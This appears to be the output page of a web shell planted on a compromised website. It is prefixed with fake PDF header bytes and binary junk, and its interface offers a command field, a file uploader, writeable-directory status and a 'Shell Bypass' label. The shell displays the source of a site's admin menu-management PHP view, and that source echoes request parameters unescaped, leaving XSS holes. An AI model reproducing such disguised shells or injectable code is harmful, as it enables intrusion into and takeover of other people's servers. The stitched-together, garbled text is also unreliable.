%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/agusttya.com/application/modules/admin/views/managemenu/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/agusttya.com/application/modules/admin/views/managemenu/managemenu.php
<div id="content-wrapper">
       <div class="container-fluid">

          <!-- Breadcrumbs-->
          <ol class="breadcrumb">
            <li class="breadcrumb-item">
              <a href="<?php echo site_url('admin/home'); ?>">Dashboard</a>
            </li>
            <li class="breadcrumb-item active">Manage Menu</li>
          </ol>

          <!-- DataTables Example -->
		  
		  <div class="card mb-3 fomr-news">
            <div class="card-header card-header-new"><h3> <i class="fas fa-table"></i> Menu Details </h3> <a href="javascript:void(0);" data-toggle="modal" data-target="#add_edit_menu" class="btn btn-default" style="margin-bottom:10px;"> Add Menu</a> &nbsp; <a href="<?=base_url('admin/managesubmenu')?>" class="btn btn-default" style="margin-bottom:10px; padding-left:10px;"> Add SubMenu</a>  &nbsp; <a href="<?=base_url('admin/managesubsubmenu')?>" class="btn btn-default" style="margin-bottom:10px; padding-left:10px;"> Add SubSubMenu</a> </div> 
	     </div> 


            <div class="card-body">
              <div class="table-responsive">
				<!---- Success Message ---->
				<?php if ($this->session->flashdata('success')) { ?>
				<p style="color:green; font-size:18px;"><?php echo $this->session->flashdata('success'); ?></p>
				</div>
				<?php } ?>
                
                <table class="table table-bordered" id="dataTable" width="100%" cellspacing="0">
                  <thead>
                    <tr>
                      <th>#</th>
                      <th>Menu Name</th>
					  <th>Display Name</th>
                      <th>Menu Url</th>
                      <th>Status</th>
                      <th>Action</th>
                    </tr>
                  </thead>
                  <tfoot>
                      <tr>
                      <th>#</th>
                      <th>Menu Name</th>
					  <th>Display Name</th>
                      <th>Menu Url</th>
                      <th>Status</th>
                      <th>Action</th>
                    </tr>
                  </tfoot>
                  <tbody>

				<?php
				if(count($menuArray)) :
				$cnt=1; 
				foreach ($menuArray as $row) :
				?>                    
                    <tr>
						<td><?php echo htmlentities($cnt);?></td>
                        <td><?php echo $row['menu_name']?></td>
						<td><?php echo $row['display_name']?></td>
                        <td><?php echo $row['menu_url']?></td>
						<td><?php echo $row['status']=='1' ? 'Active' : 'Inactive'?></td>
						<td>
                                <a href="?edit=<?= $row['id'] ?>"><span class="fa fa-edit"></span></a>
                                <a href="?delete=<?= $row['id'] ?>" class="confirm-delete"><span class="fa fa-trash confirm-delete"></span></a>
                        </td>
                    </tr>
				 <?php 
				$cnt++;
				endforeach;
				else : ?>

				<tr>
				<td colspan="6">No Record found</td>
				</tr>
				<?php
				endif;
				?>                
              
        
                  </tbody>
                </table>
            </div>

          </div>


        </div>
        <!-- /.container-fluid -->

        <!-- Sticky Footer -->

<!--Add /Edit menu modal-->
        <div class="modal fade" id="add_edit_menu" tabindex="-1" role="dialog" aria-labelledby="myModalLabel">
    <div class="modal-dialog" role="document">
        <div class="modal-content">
            <form action="" method="POST">
                <div class="modal-header">
                        <button type="button" class="close" <?php if(isset($_GET['edit'])) { ?>  onClick="history.go(-1)" <?php } else { ?> data-dismiss="modal" aria-label="Close"  <?php } ?>><span aria-hidden="true">&times;</span></button>
                        <h4 class="modal-title" id="myModalLabel">Add New Menu</h4>
                </div>
                <?php if (validation_errors()) { ?>
					<div class="alert alert-danger"><?= validation_errors() ?></div>
					<?php  } ?>
				 <div class="modal-body">
                 <input type="hidden" name="edit" value="<?= isset($_GET['edit']) ? $_GET['edit'] : '0' ?>">

                   <div class="form-group">
                            <label for="email">Menu Name</label>
                            <input type="text" name="menu_name" placeholder = 'Menu Name' class="form-control" value="<?= isset($_POST['menu_name']) ? $_POST['menu_name'] : '' ?>" id="menu_name">
                        </div>
						<div class="form-group">
                            <label for="password">Display Name</label>
                            <input type="text" name="display_name" class="form-control" placeholder = 'Menu Display Name' value="<?= isset($_POST['display_name']) ? $_POST['display_name'] : '' ?>" id="display_name">
                        </div>
						<div class="form-group">
                            <label for="email">Menu Url</label>
                            <input type="text" name="menu_url" placeholder = 'Menu Url' class="form-control" value="<?= isset($_POST['menu_url']) ? $_POST['menu_url'] : '' ?>" id="menu_url">
                        </div>
						 
					   <div class="form-group">
                            <label for="assign_role">Display Position</label>
                            <select class="form-control" name="display_position" id="display_position">
							<option value=""> -- Select  -- </option>
							<option value="0" <?php if(@$_POST['display_position']=='0') { echo 'selected = "selected"'; }?>>Both</option>
							<option value="1" <?php if(@$_POST['display_position']=='1') { echo 'selected = "selected"'; }?>>Footer</option>
							<option value="2" <?php if(@$_POST['display_position']=='2') { echo 'selected = "selected"'; }?>>Header</option>
							<option value="3" <?php if(@$_POST['display_position']=='3') { echo 'selected = "selected"'; }?>>Left</option>
							<option value="4" <?php if(@$_POST['display_position']=='4') { echo 'selected = "selected"'; }?>>Right</option>
							</select>
                       </div>
					   
						 <div class="form-group">
                            <label for="assign_role">Display Order</label>
                            <select class="form-control" name="display_order" id="display_order">
								<option value=""> -- Select Display Order -- </option>
								<?php for($k=1; $k<=20; $k++){ ?>
								<option value="<?=$k?>" <?php if(@$_POST['display_order']==$k) { echo 'selected = "selected"'; }?>><?=$k?></option>
								<?php } ?>
							</select>
                       </div>
					   
					   <div class="form-group">
                            <label for="assign_role">Status</label>
                            <select class="form-control" name="status" id="status">
							<option value=""> -- Select Status -- </option>
							<option value="1" <?php if(@$_POST['status']=='1') { echo 'selected = "selected"'; }?>>Active</option>
							<option value="0" <?php if(@$_POST['status']=='0') { echo 'selected = "selected"'; }?>>Inactive</option>
							</select>
                       </div>
					   
					   
					     <div class="form-group">
                            <label for="display_order">SEO Title</label>
                            <input type="text" name="seo_title" class="form-control" value="<?= isset($_POST['seo_title']) ? $_POST['seo_title'] : '' ?>" id="SEO Title" maxlength='150'>
                        </div> 
						
						<div class="form-group">
                            <label for="display_order">SEO Keywords</label>
                            <textarea name="seo_keywords" class="form-control" ><?= isset($_POST['seo_keywords']) ? $_POST['seo_keywords'] : '' ?></textarea>
                        </div> 
						
						<div class="form-group">
                            <label for="display_order">SEO Description</label>
                            <textarea name="seo_description" class="form-control" ><?= isset($_POST['seo_description']) ? $_POST['seo_description'] : '' ?></textarea>
                        </div>
                    </div>
                <div class="modal-footer">
                        <button type="button" class="btn btn-default" <?php if(isset($_GET['edit'])) { ?>  onClick="history.go(-1)" <?php } else { ?> data-dismiss="modal" <?php } ?>>Cancel</button>
                        <input type="submit" class="btn btn-primary" value="Save">
                </div>
            </form>
        </div>
    </div>
</div>
       <!--Add /Edit menu modal-->
<script>
<?php if (isset($_GET['edit'])) { ?>
        $(document).ready(function () {
            $("#add_edit_menu").modal('show');
        });
<?php } ?>
</script>

Kontol Shell Bypass